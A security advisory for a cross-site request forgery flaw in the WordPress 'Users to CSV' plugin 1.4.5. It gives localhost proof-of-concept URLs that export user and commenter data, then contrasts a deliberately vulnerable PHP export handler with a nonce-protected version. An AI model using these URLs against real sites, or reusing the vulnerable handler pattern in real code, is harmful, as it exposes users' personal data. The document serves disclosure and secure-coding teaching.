WordPress Users To CSV 1.4.5 Cross Site Request Forgery

2015.06.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Title: Cross-Site Request Forgery Vulnerability in Users to CSV WordPress Plugin v1.4.5
# Submitter: Nitin Venkatesh
# Product: Users to CSV WordPress Plugin
# Product URL: https://wordpress.org/plugins/users-to-csv/ (disabled)
# Plugin SVN URL: https://plugins.svn.wordpress.org/users-to-csv/ (active)
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.4.5 and possibly below.
# Tested versions: v1.4.5
# Fixed Version: None. Support for the plugin has ceased.
# CVE Status: None/Unassigned/Fresh

## Product Information:

This plugin adds an admin screen under "Users", giving two options: exporting the current users to a CSV file and exporting the unique commenters on your blog to a CSV file.

## Vulnerability Description:

User information can be exported via a GET request to users.php. The export is triggered by a plain GET request with no nonce or other anti-CSRF token, so a logged-in administrator can be made to issue it from a page they do not control.

## Proof of Concept:

http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=users
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=comments

## Solution:

Disable the plugin. Support has ceased.

## Disclosure Timeline:

2015-06-08 - Discovered. Contacted developer.
2015-06-08 - Developer responds that support for plugin has ceased.
2015-06-13 - Noticed plugin site has been disabled. It must've happened somewhere between 2015-06-09 and 2015-06-13. Contacted developer for re-confirmation.
2015-06-14 - Developer gives go-ahead for publishing a disclosure.
2015-06-15 - Publishing disclosure on Full Disclosure mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.
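The root cause described above is an export handler that runs on any GET request carrying `csv=true`, with nothing tying the request to an action the administrator actually initiated. The following is an added illustration, not the plugin's own code: it shows the weak pattern next to a hardened handler that uses WordPress's built-in nonce and capability checks. All `u2c_*` function names, the `u2c_export_users` nonce action and the `list_users` capability choice are assumptions for the example; the WordPress APIs called (`add_action`, `current_user_can`, `check_admin_referer`, `wp_nonce_url`, `add_query_arg`, `admin_url`, `sanitize_key`, `get_users`, `get_comments`, `wp_die`) are real core functions.

```php
<?php
// Added example, not the Users to CSV plugin's code. Hypothetical names:
// u2c_* functions, the 'u2c_export_users' nonce action.

// --- Weak pattern (the shape the advisory describes) ---------------------
// Any GET to users.php?page=users2csv.php&csv=true&table=users runs the
// export. The browser attaches the admin's session cookie automatically, so
// the request succeeds even when a third-party page triggered it: CWE-352.
function u2c_weak_handle_export() {
    if ( isset( $_GET['csv'] ) && 'true' === $_GET['csv'] ) {
        u2c_stream_csv( 'users' ); // no nonce, no capability check
        exit;
    }
}

// --- Hardened handler ----------------------------------------------------
function u2c_handle_export() {
    if ( empty( $_GET['csv'] ) || 'true' !== $_GET['csv'] ) {
        return;
    }

    // 1. Authorization: only users who may list users may export them.
    if ( ! current_user_can( 'list_users' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }

    // 2. CSRF defence: the request must carry a valid nonce for this action.
    //    check_admin_referer() reads $_REQUEST['_wpnonce'] and dies on failure.
    //    The nonce is bound to the logged-in user and expires, so a page on
    //    another origin cannot forge a request that passes this check.
    check_admin_referer( 'u2c_export_users' );

    // 3. Allow-list the export target instead of trusting the raw parameter.
    $table = isset( $_GET['table'] ) ? sanitize_key( $_GET['table'] ) : '';
    if ( ! in_array( $table, array( 'users', 'comments' ), true ) ) {
        wp_die( 'Invalid export target.', 'Bad request', array( 'response' => 400 ) );
    }

    u2c_stream_csv( $table );
    exit;
}
add_action( 'admin_init', 'u2c_handle_export' );

// The admin screen renders the export links with the nonce embedded. Only a
// page served by this site to this user contains the value the handler expects.
function u2c_export_link( $table ) {
    $url = add_query_arg(
        array( 'page' => 'users2csv.php', 'csv' => 'true', 'table' => $table ),
        admin_url( 'users.php' )
    );
    return wp_nonce_url( $url, 'u2c_export_users' );
}

// Streams the requested data as CSV. Only reached after both checks above.
function u2c_stream_csv( $table ) {
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="export-' . $table . '.csv"' );
    $out = fopen( 'php://output', 'w' );

    if ( 'users' === $table ) {
        fputcsv( $out, array( 'ID', 'user_login', 'user_email' ) );
        $users = get_users( array( 'fields' => array( 'ID', 'user_login', 'user_email' ) ) );
        foreach ( $users as $u ) {
            fputcsv( $out, array( $u->ID, $u->user_login, $u->user_email ) );
        }
    } else {
        // Unique commenters, keyed on e-mail address.
        fputcsv( $out, array( 'comment_author', 'comment_author_email' ) );
        $seen = array();
        foreach ( get_comments( array( 'status' => 'approve' ) ) as $c ) {
            if ( isset( $seen[ $c->comment_author_email ] ) ) {
                continue;
            }
            $seen[ $c->comment_author_email ] = true;
            fputcsv( $out, array( $c->comment_author, $c->comment_author_email ) );
        }
    }
    fclose( $out );
}
```

Two points are worth keeping in mind when reviewing a handler like this. First, the nonce check alone is not an authorization check: a low-privileged user who can obtain a valid nonce would still be stopped only by the `current_user_can` test, so both are needed. Second, hooking the export on `admin_init` means it runs for any admin request, which is why the early return on a missing `csv` parameter matters; the same checks apply whether the link is followed from the plugin's screen or typed directly.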

